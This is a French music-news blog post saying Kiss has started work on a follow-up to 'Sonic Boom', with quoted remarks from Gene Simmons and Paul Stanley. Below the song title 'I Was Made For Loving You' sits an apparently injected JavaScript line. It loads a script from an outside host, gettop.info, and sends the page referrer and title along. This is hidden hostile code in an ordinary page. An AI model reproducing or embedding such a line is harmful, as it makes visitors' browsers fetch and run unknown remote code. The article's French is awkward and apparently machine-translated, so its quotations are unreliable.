Kiss sortirait un album avant la fin de l’année!


Facebooktwitterredditpinterestlinkedinmail

Selon une annonce faite sur le site du batteur de Kiss Eric Singer web officiel, le groupe auraient déjà commencé les séances de répétition pour son nouvel album, provisoirement prévue avant la fin de l’année.

Le groupe Kiss a prévu d’entrer en studio cette semaine pour commencer à enregistrer la suite de l’album sorti en 2009 « Sonic Boom » dans un communiqué avant la fin de 2011. Le 10 Mars dernier, un entretien avec DJ JC Green d’Alfa Rock 105.7 FM et Metal Messiah Radio « Heavy Metal Thunder » , le bassiste de Kiss Gene Simmons et le chanteur Paul Stanley ont déclaré à propos du CD à venir, « Le nouveau record, dont nous avons déjà commencé à travailler dessus, va être la prochaine étape il devrait ressembler à « Sonic Boom ». Nous aurons droit qu’a des chansons rock, aucune ballade, pas de claviers, rien, juste du rock … Un grand nombre de chansons ont été écrites par l’ensemble du groupe, donc pas d’écrivains de l’extérieur, juste la bande originale et de faire ce qu’ils ont fait sur les trois premiers enregistrements – écrit les chansons nous-mêmes ». Il a ajouté, «Nous avons presque toutes les chansons écrites, en fait, nous avons trop de chansons;. Nous avons environ 20 à 25 des choses qui sont écrites et le nous avons un excellent son pour ce dernier album. »

Kiss – I Was Made For Loving You


s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Blink 182 sortira un nouvel album cet été.
Next Steve Hill couronnés aux Lys Blues 2011

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *